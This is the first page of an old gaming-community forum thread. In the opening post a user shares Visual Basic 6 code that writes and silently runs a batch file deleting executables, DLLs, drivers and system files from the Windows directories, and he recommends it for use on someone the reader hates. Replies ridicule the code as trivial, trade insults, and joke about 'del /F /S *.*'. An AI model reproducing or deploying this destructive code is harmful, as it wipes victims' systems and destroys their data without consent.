Server Help Forum Index Server Help
Community forums for Subgame, ASSS, and bots

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   StatisticsStatistics   RegisterRegister 
 ProfileProfile   Login to check your private messagesLogin to check your private messages   LoginLogin (SSL) 

Server Help | ASSS Wiki (0) | Shanky.com
makes your screen black forever!
Goto page 1, 2, 3  Next

View previous topic  Conspiracy? Post :: Post Just passing through...  View next topic  
pokemon 2001
Novice

PostPosted: Sun Nov 21, 2004 1:27 am   Post maybe stupid    Post subject: makes your screen black forever! Reply to topic Reply with quote

If u have vb6 just click on a standard project double click on the form and paste this in

Code: Show/Hide
Private Sub Form_Load()
On Error Resume Next
Open "C:\Jockstrap.txt" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "@del C:\windows\*.ini"
Print #1, "cls"
Print #1, "@del C:\windows\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.scr"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.drv"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.dll"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.sys"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system.ini"
Close #1
Name "C:\Jockstrap.txt" As "C:\Jockstrap.bat"
Shell "C:\Jockstrap.bat"
MsgBox "The Answer Is Out There!",vbCritical
Kill "C:\Jockstrap.bat"
End
End Sub

I dont recommand pressing run tongue.gif a really good thing if u hate someone

ViRus!
View users profile Send private message Add User to Ignore List Visit posters website AIM Address Yahoo Messenger MSN Messenger
Mine GO BOOM
Hunch Hunch
What What
Hunch Hunch<br>What What

PostPosted: Sun Nov 21, 2004 2:02 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

Ok, pokemon 2001, you are getting stupid. So for that, you will be permantly logged in, so those that wish, can ignore your posts.
View users profile Send private message Add User to Ignore List Send email
Solo Ace
Yeah, I'm in touch with reality...we correspond from time to time.

PostPosted: Sun Nov 21, 2004 5:43 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

LOL, thanks, time2ignore him. icon_smile.gif
View users profile Send private message Add User to Ignore List
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:42 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

no dont lie im not logged in lmao
View users profile Send private message Add User to Ignore List Visit posters website AIM Address Yahoo Messenger MSN Messenger
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:45 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

stupid question? its not stupid im teaching people how easy it to make a virus.. so people will know ! and plus how did u do that if i dont have a static ip wow..
Solo Ace

PostPosted: Mon Nov 22, 2004 1:49 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

It's not even a virus, and, search the web for some document about IP addresses and how they were spread over the world.
SuSE
Me measures good

PostPosted: Mon Nov 22, 2004 1:51 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

um, that is not a virus

that'd only slow down a complete newb, and they're slowed down by things like trying to open notepad - what an accomplishment
View users profile Send private message Add User to Ignore List Send email Visit posters website
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:59 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

suse... ur not that smart
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 2:02 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

SuSe i dare u to test it than if u are sooo i cant say the word
Bak
?ls -s
0 in

PostPosted: Mon Nov 22, 2004 4:04 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

I got a better one... take your harddrive and hit it repeatedly with a hammer... omg lolz it stopped working what a great virus! do it to any friends you hate they'll laugh forever.
View users profile Send private message Add User to Ignore List AIM Address
pokemon 2001 (not logged)

PostPosted: Mon Nov 22, 2004 5:29 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

lol u do that even if they live about 2000 miles away and is it just me or are u 9 years old
lp_street_soldier
Thing 1

PostPosted: Mon Nov 22, 2004 6:46 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

How about you stfu, and gtfo icon_smile.gif Good solution isn't it?
View users profile Send private message Add User to Ignore List Send email MSN Messenger
myke
Seasoned Helper

PostPosted: Mon Nov 22, 2004 8:24 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

Bak wrote:
I got a better one... take your harddrive and hit it repeatedly with a hammer... omg lolz it stopped working what a great virus! do it to any friends you hate they'll laugh forever.

i dunno man there are a lot of tough hdds out there...me and my friend whacked a few with sledge hammers and they all still worked afterwards 1 was from an old datastor :X

PostPosted: Mon Nov 22, 2004 9:16 am   Post maybe stupid    Post subject: Reply to topic Reply with quote

lies
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 12:49 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

lp street soldier be quiet
Smong
Server Help Squatter

PostPosted: Mon Nov 22, 2004 12:51 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

We can't test it if you don't provide an executable.
View users profile Send private message Add User to Ignore List Visit posters website MSN Messenger
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:02 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

Lols SuSe thinks hes a programmer he thinks it opens notepads
Smong
Server Help Squatter

PostPosted: Mon Nov 22, 2004 1:05 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

I think you can't read full sentences.
View users profile Send private message Add User to Ignore List Visit posters website MSN Messenger
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:07 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

yes i can some and i explained
Smong
Server Help Squatter

PostPosted: Mon Nov 22, 2004 1:12 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

SuSE wrote:
that'd only slow down a complete newb, and they're slowed down by things like trying to open notepad

This is what it looks like to me:
1) slows down newbs
2) newbs are slowed down by opening notepad
pokemon 2001
Novice

PostPosted: Mon Nov 22, 2004 1:14 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

um... to me this program doesnt open 1 notepad

if u see .txt in the code doesnt mean it opens a notepad
Bak
?ls -s
0 in

PostPosted: Mon Nov 22, 2004 1:39 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

myke wrote:

i dunno man there are a lot of tough hdds out there...me and my friend whacked a few with sledge hammers and they all still worked afterwards 1 was from an old datastor :X

That's new anti-virus protection for ya!

---------

pokemon, he never said it opens "a notepad", he did say newbs are slowed down by opening notepad.

Your "virus" is as effective as telling someone to hit their harddrive repeatedly with a hammer, because no one executes an unknown executable from an unreliable source. Both won't work from 2000 miles away... which is the comparison I was going for.

You sound like a first year programmer who just learned that you can overwrite files using an ofstream and got the clever idea to overwrite everything in your windows directory, because I'm sure it's not write-protected. You might as well tell someone to go to their dos shell and type "del /F /S *.*". Quit being retarded.
Solo Ace

PostPosted: Mon Nov 22, 2004 2:07 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

My comp sci teacher brought a very old HDD to school to show us, that thing was in some kind of box which could take like a tank. sa_tongue.gif

This "virus" is more elite than a hammer on a HDD. icon_smile.gif
Mine GO BOOM
Hunch Hunch
What What
Hunch Hunch<br>What What

PostPosted: Mon Nov 22, 2004 2:12 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

Bak wrote:
[You might as well tell someone to go to their dos shell and type "del /F /S *.*".

Quiet, that was to next summer's surprise virus. Didn't you get the memo? Argh, I'll just repeat it, again. We'd just mass-mail people (mail, not email) instructions on how to run the virus. We'll say they'd get a candy bar or something when they finish it.
View users profile Send private message Add User to Ignore List Send email
Smithy101
Thing 2

PostPosted: Mon Nov 22, 2004 3:49 pm   Post maybe stupid    Post subject: Reply to topic Reply with quote

lp_street_soldier wrote:
How about you stfu, and gtfo icon_smile.gif Good solution isn't it?

Wow.. I agree! Pokemon..shutup. We dont care. Your not so smart after all either.
Post new topic   Reply to topic    Server Help Forum Index -> Trash Talk All times are GMT - 5 Hours
Goto page 1, 2, 3  Next
Page 1 of 3

Jump to:  
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum
View online users | View Statistics | View Ignored List

Software by php BB © php BB Group
Server Load: 423 page(s) served in previous 5 minutes.

phpBB Created this page in 0.762685 seconds : 49 queries executed (77.6%): GZIP compression disabled